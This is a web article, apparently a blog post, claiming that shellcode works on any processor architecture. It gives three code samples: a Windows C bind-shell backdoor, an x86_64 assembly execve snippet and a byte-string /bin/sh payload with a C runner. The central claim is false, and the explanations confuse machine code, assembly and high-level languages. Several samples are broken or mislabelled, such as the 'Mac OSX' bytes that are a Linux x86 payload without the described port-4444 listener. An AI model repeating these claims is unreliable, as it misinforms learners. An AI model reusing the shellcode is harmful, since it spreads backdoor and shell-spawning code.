Promoting Freedom for Creative Architecture
Shellcode is a piece of code that an attacker injects into a compromised system to execute a malicious command. Its primary goal is to take control of a system's resources, from simple tasks such as data theft to more complicated tasks such as giving access to the attacker to the entire server. Shellcode is written in Assembly language and, by design, it has minimalized size to fit in the smallest injection vectors.
When it comes down to it, shellcode is not specific to a particular processor architecture. In this article, we'll discuss why, and provide some examples.
Developers use different high-level languages when coding programs for a specific processor architecture. A high-level language is an easy to read and use language with complex syntax that can be compiled into executable machine code, which runs on a specific processor architecture.
Machine code is also called assembly language. Each processor architecture has its assembly language version, which can be understood directly by the instruction set of the processor. Programmatically, machines code are sequences of numbers that are closely related to a processor's instruction set.
While an executable file produced from a high-level language for a specific processor architecture contains machine code for that particular processor architecture, shellcode is not coded from high-level languages. Instead, it's coded in assembly language, which produces machine code. Therefore, shellcode becomes universal to any processor architecture that can execute compiled assembly language.
Shellcode executes by exploiting system vulnerabilities in underlying operating systems. The operating system is in charge of translating shellcode's machine code running on a particular processor's architecture into readable high-level languages that interact with the system's resources.
If the high-level language understands the machine code, it can translate and interact with the system's resources regardless of the processor architecture that executes the machine code. For this reason, shellcode's interaction with the operating system means that it is not processor specific.
Here are some examples of shellcodes that work on different processor architectures:
1. Windows x86 and x64 Shellcode:
This is one of the most common and universal shellcodes that work at the Windows operating system. It can, however, work on a different operating system that shares the same system calls (creation of processes, reading and writing of file streams, and operations on the registry, among others).
Assuming this shellcode is already injected into a target system's memory, the basic code which creates a backdoor and listening for incoming connections looks like this:
```
DWORD WINAPI StartUp(LPVOID lpParameter)
{
WSADATA wsaData;
SOCKADDR_IN server;
SOCKET listenSocket;
SOCKET acceptSocket;
WSAStartup(MAKEWORD(2,2),&wsaData);
listenSocket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(443);
server.sin_addr.s_addr = htonl(INADDR_ANY);
bind(listenSocket,(SOCKADDR *)&server,sizeof(server));
listen(listenSocket,SOMAXCONN);
acceptSocket=accept(listenSocket,NULL,NULL);
CreateProcess("cmd.exe",NULL,NULL,NULL,FALSE,0,NULL,NULL,NULL,NULL);
return 0;
}
```
2. Linux x86_64 Shellcode:
This shellcode is written in Assembly language (x86_64) and requires the execution of a privileged operation on some system calls (such as open, read, and write) to achieve a particular outcome. If executed, this shellcode forks the current process, and the new child process executes a system shell to receive user input. Here is an overview of the Linux x86_64 shellcode:
```
push rbp
mov rbp, rsp
cwd
cdq
push 0x68732f6e
push 0x69622f2f
mov rbx, rsp
push rax
push rbx
mov rcx, rsp
xor rdx, rdx
mov al, 0x3b
syscall
```
3. Mac OSX, x86 Shellcode:
This shellcode's primary objective is to open a backdoor listening on TCP port 4444, accepting incoming connections, and launching a shell handler process when the connection is established.
```
#include
unsigned char buf[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main()
{
int (*func) ();
func = (int (*) ()) buf;
(int) (*func) ();
}
```
In conclusion, shellcode is a specific type of code that works on any processor architecture because it is coded in assembly language, which produces machine code as a final program. This machine code is the universal code that can execute on any processor architecture and interact with the underlying system, provided the high-level languages of the operating system understand the machine code. To learn more about shellcodes, it's essential to understand assembly language, system calls of the primary operating systems, and the possible ways to inject the generated shellcode into the target system.
